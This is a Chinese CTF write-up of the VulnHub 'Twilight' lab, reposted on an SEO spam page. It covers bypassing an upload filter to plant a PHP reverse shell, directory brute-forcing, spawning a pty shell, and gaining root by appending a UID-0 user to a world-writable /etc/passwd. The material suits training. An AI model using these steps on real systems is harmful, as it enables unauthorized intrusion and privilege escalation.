当前位置: 首页 > news >正文

卫浴建材网站建设怎么打广告吸引客户

卫浴建材网站建设,怎么打广告吸引客户,抖音代运营是啥,吉安企业做网站TWILIGHT靶场详解 下载地址:https://download.vulnhub.com/sunset/twilight.7z 这是一个比较简单的靶场,拿到IP后我们扫描发现开启了超级多的端口 其实这些端口一点用都没有,在我的方法中 但是也有不同的方法可以拿权限,就需要…

TWILIGHT靶场详解

下载地址:https://download.vulnhub.com/sunset/twilight.7z

这是一个比较简单的靶场,拿到IP后我们扫描发现开启了超级多的端口

其实这些端口一点用都没有,在我的方法中

但是也有不同的方法可以拿权限,就需要这些开放的服务了

image-20230731185350272

扫描目录时候我们发现有一个文件上传的目录,只能上传图片。

dirsearch -u http://192.168.102.199/gallery/

image-20230731185404809

但是我们抓包的时候可以上传PHP文件,然后修改成图片类型。

image-20230731185637352

这样就能上传一个反弹shell

image-20230731185613220

然后我有扫描了一下上传后文件所在的目录,这里用了一个大字典扫描,小字典扫描不到。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.102.199/gallery/    

image-20230731190908704

点击我们上传的php文件,下面那个也是我上传的。

image-20230731190934157

这样我们kali就拿到了一个webshell

image-20230731190946469

利用python3美化一下命令行,同时也提高了权限。

python3 -c "import pty;pty.spawn('/bin/bash')"

查看passwd文件的时候发现这个文件是所有人可读可写的。

我们就可以利用这个漏洞,插入一个新用户。

image-20230731191337612

利用下面命令我们就可以插入一个新的有root权限的用户,密码需要加密,我们用openssl工具可以加密对应的账号密码。

echo 'tang:$1$tang$pBxlp5xZvZzeAXxc4Ki/v0:0:0:root:/root:/bin/bash' >> /etc/passwd

image-20230731191604691

su tang登陆新用户发现就是root权限了。

image-20230731191701773

http://www.mmbaike.com/news/81081.html

相关文章:

  • 成都网站建设托管我想做地推怎么找渠道
  • 百度网站认证v1预测2025年网络营销的发展
  • 教育网站制作运营宁波网络推广产品服务
  • 酒店手机网站首页设计网络营销的六大功能
  • 三亚谁做网站想学编程去哪里找培训班
  • 做游戏ppt下载网站今日足球比赛预测推荐分析
  • 阿里轻云wordpressseo行业
  • 网站维护运营优化公司seo技术培训东莞
  • 网站的meta标签优化seochan是什么意思
  • 有哪些做任务赚钱的网站重庆疫情最新消息
  • 建立政府公众网站的目的的网站模板源码
  • 阀门网站设计百度知道问答
  • 厦门网站建设哪家好网络优化工程师是干什么的
  • 做网站设计能赚钱吗百度推广优化中心
  • 武汉做网站建设青岛seo关键词排名
  • 东莞 营销网站市场营销网络
  • 在什么网站做知识禁毒竞赛活动推广方式
  • 聊城做网站的公司教程网站源码
  • 龙泉建设局网站广州知名网络推广公司
  • 中国人民建设人行网站首页义乌最好的电商培训学校
  • 东莞南城外贸网站建设成都网站优化平台
  • 四川疫情第二波最新消息兰州seo技术优化排名公司
  • 晋城城乡建设局网站专业网络推广外包
  • 做印量调查的网站新浪博客
  • 哪个网站买域名便宜环球军事网
  • 什么软件可以做网站企业管理培训
  • 专业动画制作软件怎么快速优化关键词
  • 门户网站开发需求分析报告如何自己制作一个网站
  • 做网站合成APP百度官方网站
  • 做网站用lunx技术优化seo